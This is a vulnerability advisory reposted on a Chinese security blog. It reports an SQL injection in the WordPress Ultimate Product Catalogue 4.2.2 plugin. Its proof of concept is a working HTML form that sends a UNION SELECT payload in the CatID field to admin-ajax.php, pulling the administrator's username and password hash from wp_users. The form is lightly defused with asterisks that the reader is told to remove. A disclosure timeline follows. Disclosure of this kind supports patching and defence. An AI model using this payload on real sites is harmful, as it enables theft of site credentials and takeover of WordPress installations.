WordPress Ultimate Product Catalogue 4.2.2 Plugin – SQL Injection

# Version: 4.2.2
# Tested on: Ubuntu 16.04

1 – Description:

Type user access: register user.

$_POST[‘CatID’] is not escaped.

Ultimate Product Catalogue 4.2.2 Sql Injection

2 – Proof of Concept:

1 – Login as regular user (created using wp-login.php?action=register):

2 – Using:

<*form method="post" action="http://target/wp-admin/admin-ajax.php?action=get_upcp_subcategories">
<*input type="text" name="CatID" value="0 UNION SELECT user_login,user_pass FROM wp_users WHERE ID=1">
<*input type="submit">

*delete “*” in code*

3 – Timeline:

– 22/05/2017 – Discovered
– 24/05/2017 – Vendor not finded
– **/06/2017 – Corrected

本文固定链接: https://www.unhonker.com/bug/1995.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2017年06月28日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: WordPress Ultimate Product Catalogue 4.2.2 Plugin – SQL Injection | 90' s Blog|关注网络信息安全
关键字:

WordPress Ultimate Product Catalogue 4.2.2 Plugin – SQL Injection:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!